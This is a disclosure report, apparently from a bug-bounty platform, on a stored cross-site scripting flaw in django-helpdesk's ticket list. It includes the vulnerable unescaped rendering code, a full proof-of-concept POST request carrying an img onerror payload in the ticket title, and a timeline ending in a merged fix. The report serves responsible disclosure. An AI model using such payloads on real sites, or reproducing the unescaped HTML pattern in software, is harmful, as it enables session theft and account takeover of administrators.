Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk

Valid

Reported on

Nov 3rd 2021


Description

Stored XSS via parameter [title] when create new ticket

Details

At the table tickets in admin, when rendering data for column [Ticket] it allows for arbitrary execution of JavaScript

Vulnerability code

{
                        data: "ticket",
                        render: function (data, type, row, meta) {
                            if (type === 'display') {
                                data = '<div class="tickettitle"><a href="' + get_url(row) + '" >' +
                                    row.id + '. ' +
                                    row.title + '</a></div>';
                            }
                            return data
                        }
                    },

Render with [title] contain payload

<td><div class="tickettitle"><a href="/tickets/57832/">57832. "&gt;<img src="x" onerror="alert(1);"></a></div></td>

Proof of Concept

// PoC.req
POST /tickets/submit/ HTTP/1.1
Host: django-helpdesk-demo.herokuapp.com
Cookie: csrftoken=5xfltA7UxP3sMJG5OHKCAlHRzR9mrrUbXWfwOrJJl6JhC3OszzsZBcFMEmbCsIeh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-helpdesk-demo.herokuapp.com/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------35329910622610784793670383726
Content-Length: 1150
Origin: https://django-helpdesk-demo.herokuapp.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="csrfmiddlewaretoken"

Sn6i713aQfmhgW3ET6Q39tRXE3yt0kePKM6tsSFZEw266gb1EYyqakPSJyAJ1ByV
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="queue"

1
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="title"

"><iMg SrC="x" oNeRRor="alert(1);">
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="body"

test
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="priority"

3
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="due_date"


-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream


-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="submitter_email"

test@example.com
-----------------------------35329910622610784793670383726--

Step to Reproduct

Goto URL without login to create a new ticket: https://django-helpdesk-demo.herokuapp.com/tickets/submit/

At field [Summary of the problem] input with payload: "><iMg SrC="x" oNeRRor="alert(1);">

The XSS will trigger when the admin load all tickets

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the django-helpdesk team within 24 hours. 2 years ago
lethanhphuc modified the report
2 years ago
We have contacted a member of the django-helpdesk team and are waiting to hear back 2 years ago
We have sent a follow up to the django-helpdesk team. We will try again in 7 days. 2 years ago
django-helpdesk/django-helpdesk maintainer validated this vulnerability 2 years ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
lethanhphuc submitted a
2 years ago
lethanhphuc
2 years ago

Researcher


PR: https://github.com/django-helpdesk/django-helpdesk/pull/980

2 years ago

fix has been merged and will be released in next bugfix release. thanks!

django-helpdesk/django-helpdesk maintainer marked this as fixed with commit 2c7065 2 years ago
lethanhphuc has been awarded the fix bounty
This vulnerability will not receive a CVE
ticket_list.html#L369 has been validated
to join this conversation